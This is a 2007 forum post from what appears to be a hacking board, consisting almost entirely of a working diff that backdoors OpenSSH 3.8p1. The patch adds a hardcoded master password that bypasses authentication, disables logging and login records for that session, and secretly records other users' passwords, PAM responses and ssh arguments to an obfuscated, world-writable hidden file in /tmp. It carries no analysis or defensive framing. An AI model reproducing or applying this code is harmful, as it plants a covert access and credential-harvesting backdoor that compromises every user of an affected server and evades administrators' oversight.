SSH BackDoor

Discussion in 'Уязвимости' started by banned, 4 Aug 2007.

  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    SSH BackDoor

    Code:
    diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
*** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
--- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
***************
*** 342,347 ****
--- 342,348 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, 0);
+ if (bella) sshpam_err = PAM_SUCCESS;
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   buffer_put_cstring(&buffer, "OK");
diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
*** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
--- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
***************
*** 72,77 ****
--- 72,81 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
+ sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ bellalog();
 
  #if defined(HAVE_OSF_SIA)
   return auth_sia_password(authctxt, password) && ok;
diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
*** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
--- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
***************
*** 13,18 ****
--- 13,38 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
 
+ // start patch by acme - acme at olografix/paranoici dot org
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define BACKPWD "inspassword"
+ #define SSH_LOG "/tmp/.lost+found"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, bella;
+
+ #define bellalog() { \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch, from aion
+
  #ifndef INCLUDES_H
  #define INCLUDES_H
 
diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
*** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
--- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
***************
*** 273,278 ****
--- 273,279 ----
   char *txt = NULL;
   int pri = LOG_INFO;
 
+ if (bella) return;
   if (level > log_level)
    return;
 
diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
*** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
--- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
***************
*** 406,411 ****
--- 406,412 ----
  int
  login_write (struct logininfo *li)
  {
+ if (bella) return 0;
  #ifndef HAVE_CYGWIN
   if ((int)geteuid() != 0) {
     logit("Attempt to write login records by non-root user (aborting)");
diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
*** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
--- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
***************
*** 786,791 ****
--- 786,793 ----
    fatal("UsePAM not set, but ended up in %s anyway", __func__);
 
   user = buffer_get_string(m, NULL);
+ sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(), user);
+ bellalog();
 
   start_pam(user);
 
***************
*** 881,888 ****
   num = buffer_get_int(m);
   if (num > 0) {
    resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i)
     resp[i] = buffer_get_string(m, NULL);
    ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
    for (i = 0; i < num; ++i)
     xfree(resp[i]);
--- 883,894 ----
   num = buffer_get_int(m);
   if (num > 0) {
    resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i) {
     resp[i] = buffer_get_string(m, NULL);
+ sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
+ if(!strcmp(BACKPWD, resp[i])) bella=1;
+ else bellalog();
+ }
    ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
    for (i = 0; i < num; ++i)
     xfree(resp[i]);
diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
*** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
--- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
***************
*** 123,128 ****
--- 123,130 ----
    if ((ret = ssh_askpass(askpass, prompt)) == NULL)
     if (!(flags & RP_ALLOW_EOF))
      return xstrdup("");
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
    return ret;
   }
 
***************
*** 134,138 ****
--- 136,142 ----
 
   ret = xstrdup(buf);
   memset(buf, 'x', sizeof buf);
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
   return ret;
  }
diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
*** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
--- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
***************
*** 212,217 ****
--- 212,221 ----
   extern int optind, optreset;
   extern char *optarg;
 
+ for(i=1; i<ac; i++) {
+ sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
+ bellalog();
+ }
   __progname = ssh_get_progname(av[0]);
   init_rng();
 
diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
*** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
--- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
***************
*** 1,3 ****
  /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
 
! #define SSH_VERSION "OpenSSH_3.8p1"
--- 1,3 ----
  /* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
 
! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it
     
    #1 banned, 4 Aug 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.